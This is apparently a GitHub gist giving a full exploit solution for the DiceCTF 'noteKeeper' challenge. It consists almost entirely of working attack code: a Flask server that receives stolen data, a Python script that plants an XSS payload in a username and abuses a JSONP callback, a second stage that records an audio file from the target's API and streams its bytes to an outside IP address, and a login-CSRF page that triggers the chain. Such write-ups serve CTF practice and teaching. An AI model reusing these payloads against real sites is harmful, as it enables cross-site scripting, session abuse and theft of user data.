Skip to content

Instantly share code, notes, and snippets.

@loknop
Last active February 6, 2022 21:08
Show Gist options
  • Save loknop/16fecad7a0a75ffac942b27103c371aa to your computer and use it in GitHub Desktop.
Save loknop/16fecad7a0a75ffac942b27103c371aa to your computer and use it in GitHub Desktop.
noteKeeper solution dicectf
from flask import Flask
app = Flask(__name__)
@app.route("/")
def main():
return """\
<script>
onmessage = e => {
ifr = document.createElement("iframe");
ifr.src = "/dump/" + e.data;
document.body.append(ifr);
}
</script>
"""
@app.route("/dump/<info>")
def test(info):
data = info.split(":")
with open(data[0] + ".txt", "w") as f:
f.write(data[1])
return "xd"
app.run(host="0.0.0.0")
import requests
from urllib import parse
import secrets
#url = "http://localhost"
url = "https://notekeeper.mc.ax"
endpoint_url = "http://104.248.133.199:5000/" # this runs app.py
token = secrets.token_hex()
payload = f"""\
<iframe srcdoc="<script src='/api/notes/list?callback=parent.opener.setTimeout'></script>"></iframe>\
""" + token
payload = parse.quote(payload)
stage2 = f"""\
w = window.open()
recording_code = `
<button id=logout></button>
<script>
async function sleep(ms) {{
return new Promise(resolve=>setTimeout(resolve, ms));
}}
logout.onclick = async e => {{
try {{
a = new Audio("{url}/api/audio/file?");
await sleep(100);
const ac = new AudioContext();
const source = ac.createMediaElementSource(a);
const dest = ac.createMediaStreamDestination();
source.connect(dest);
const recorder = new MediaRecorder(dest.stream);
recorder.start();
a.play();
recorder.ondataavailable = ev => {{
console.log(ev.data);
ev.data.arrayBuffer().then(async buf =>{{
arr = new Uint8Array(buf);
w2= window.open("{endpoint_url}");
await sleep(500);
console.log(w2);
for (let i=0; i<arr.length; i += 1000) {{
data = i + ":" + new Uint8Array(arr.subarray(i, i+1000)).toString();
console.log(data);
w2.postMessage(data, "*");
}}
}})
}};
await sleep(10000);
recorder.stop();
}} catch (ex) {{
console.log(ex);
navigator.sendBeacon("{endpoint_url}" + ex);
}}
}}
</script>
`
w.eval(`
async function sleep(ms) {{
return new Promise(resolve=>setTimeout(resolve, ms));
}}
(async () =>{{
await sleep(5000);
opener.location = "{url}/script.js"
script_content = atob("${{btoa(recording_code)}}");
console.log(script_content);
await sleep(500);
opener.document.write(script_content);
}})()
`)
"""
password = "asdasd"
print(f"username: {payload}")
print(f"password: {password}")
sess = requests.session()
r1 = sess.post(url + "/api/register", headers={
"Content-Type": "application/x-www-form-urlencoded"
}, data = f"username={payload}&username&password={password}")
r2 = sess.post(url + "/api/notes/add", headers={
"Content-Type": "application/x-www-form-urlencoded"
}, data={"note": stage2})
print(r2.status_code)
<form id=testform method="post">
<input name=username value=""/>
<input name=username value="">
<input name="password" value="">
</form>
<script>
//url = "http://localhost";
url = "https://notekeeper.mc.ax"
testform.action = url + "/api/login";
testform.username[0].value = decodeURIComponent("%3Ciframe%20srcdoc%3D%22%3Cscript%20src%3D%27/api/notes/list%3Fcallback%3Dparent.opener.setTimeout%27%3E%3C/script%3E%22%3E%3C/iframe%3Ebb569ca119e8dc25933b390a06a615adbad2d8304ad176f5ae98948c5d315aea");
testform.password.value = "asdasd";
testform.target = "_blank";
testform.submit();
location = url + "/script.js";
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment